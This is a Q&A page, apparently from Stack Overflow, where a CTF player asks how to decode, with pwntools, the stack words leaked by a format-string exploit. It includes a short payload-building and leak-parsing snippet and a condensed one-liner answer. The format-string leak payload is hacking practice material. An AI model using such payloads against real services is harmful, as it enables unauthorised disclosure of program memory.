0

I've been learning the pwntools python library and using it to build solutions to CTF challenges. One thing I keep running into is that, after a successful exploit (say of a format string vulnerability) where I get the program to leak the memory I want, it's a pain to format the output in such a way as to easily read the flag.

This feels like something that there is a one-liner inside of pwntools to address, but I have not been able to find it.

My current solution (which works) seems like it's harder than it needs to be, so I'm hoping I'm just blind and missing the one-liner I suspect is there.

Here is what I'm doing now:

for n in range(32, 32+16):
    payload += "%" + str(n) + "$x."

r.send(payload)
r.send("\n")

# disregard one line
r.recvline()

# this is where I get my memory leak, in the form of hex numbers seperated by '.'
data = r.recvline()

dataBytes = data.split(b'.')

answer = b''
for db in dataBytes:
    
    # pad the bytes to full width
    while len(db) < 8:
        db = b'0' + db

    i = int.from_bytes(unhex(db))
    answer += pack(i,endian="little")

print( answer )
Improve this question

1 Answer 1

Reset to default
1

You actually don't need to pad the hex to 8 characters first. int(x, 16) will handle short hex just fine.

For example, if you know you're leaking 64-bit values:

data = r.recvline().strip().split(b'.')
answer = b''.join(p64(int(x, 16)) for x in data)
print(answer)

If you’re on a 32‐bit challenge, just swap in p32

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

That helps. I did find I needed to add a [:-1] to the end of the first line, as the split left me with a trailing b'' which int() doesn't like.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.